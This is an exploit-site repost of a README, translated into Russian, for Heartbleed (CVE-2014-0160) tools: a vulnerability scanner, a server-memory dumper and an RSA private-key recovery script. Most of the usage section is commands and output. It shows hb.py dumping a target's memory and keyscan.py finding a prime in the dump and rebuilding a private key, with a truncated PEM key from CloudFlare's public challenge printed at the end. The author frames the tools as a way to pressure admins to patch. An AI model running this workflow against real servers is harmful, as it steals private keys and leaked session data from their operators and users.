Sploitus

Exploit for heartbleed-tools

kitploit · 2026-08-25

Exploit Code

MARKDOWN65 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-EINAROS-HEARTBLEED-TOOLS
## Сканер уязвимости OpenSSL Heartbleed (CVE-2014-0160), дата-майнер и инструменты восстановления RSA-ключей.

Автор: Einar Otto Stangvik / @einaros / https://hacking.ventures

Поскольку секрет давно раскрыт, и другие уже начали публиковать свои инструменты, я тоже выкладываю свои. Надеюсь, это усилит давление на тех, кто до сих пор не установил патчи или не обновил свои серверы. Другие могут найти эти инструменты полезными в образовательных целях.

В отличие от многих других PoC Heartbleed, этот инструмент предоставит максимально возможное количество шифров в начальном пакете ClientHello. Какой бы шифр ни выбрал сервер, он будет использоваться для всех последующих пакетов ClientHello в сессии дампа. Это должно обеспечить надлежащее обнаружение уязвимости, а также снизить накладные расходы после того, как шифр будет найден.

Используйте эти инструменты как вам угодно, но окажите всем нам услугу: решайте проблемы, а не создавайте их.

Вдохновлено работами и публикациями:

  * Jared Stafford
  * Jeremi M Gosney
  * Ben M Murphy
  * ... и многих других.



### Использование:

Здесь показано восстановление одного из RSA-простых чисел задачи CloudFlare 34 раза за одну минуту. Это означает получение полного закрытого ключа 34 раза за одну минуту. ![img](https://assets.kitploit.com/production/public/readmes/25053/9050471e95b1a0b605d34327108ce024ac769a0de3b7e78a761d1325bb81fd84.png)

root@kitploit:~
    
    
    # Test vulnerability using unobtrusive mode
    # This will request N bytes, but supply N-1 itself, so that the server will
    # only actually bleed a single byte if vulnerable. Suggested N is 16360 in this
    # case, since that will result in a single TLS record: 
    # 3 + 2 + 1 + 2 + 16360 + 16 bytes = 0xFFFF.
    
    $ ./hb.py -u -n 16360 -p 443 www.example.int
    www.example.int:443 is vulnerable
    
    # Dupm data from CloudFlare's old challenge server
    
    $ ./hb.py -p 443 www.cloudflarechallenge.com -n 0xF000 -l 100 -t 50 -d -o cloudflare-dump.bin
    [2014/04/14 10:55:48] Incoming data rate: 85877 kbps
    ... runs for a while
    
    # Look for prime in the dump
    
    $ ./keyscan.py cloudflare.crt cloudflare-dump.bin
    Key size: 128
    Data length: 173476834
    cloudflare-dump.bin Offset 0xf155ec: p = 13827796798740740191625032142481917804987720337701...
    
    # Extract key once found
    
    $ ./keyscan.py cloudflare.crt cloudflare-dump.bin 0xf155ec
    Prime should be at offset: f155ec
    Key size: 128
    
    Hexdump of surrounding data:
    f151ec: D0 00 00 00 00 00 00 00 00 00 00 00 00 00 30 C0  ..............0.
    f151fc: 3C 01 00 00 00 00 00 00 00 00 00 00 00 00 90 8B  <...............
    f1520c: D0 00 00 00 00 00 02 00 C3 A3 4D 08 48 47 00 00  ..........M.HG..
    ...
    
    -----BEGIN RSA PRIVATE KEY-----
    MIIEogIBAAKCAQEAm0AWkVnDx5feOctdC97Ztgvtd25uKKmhjCHpLycmExe1RiRSl/hGIL7f8Fg/
    qiUztVm5uXZJ1UG7dzz+9OtTNh+v27BtzPsU3yivHevwAB1mTMtP6bPuXBjzsxRcC9yVcBBWpKBM
    ...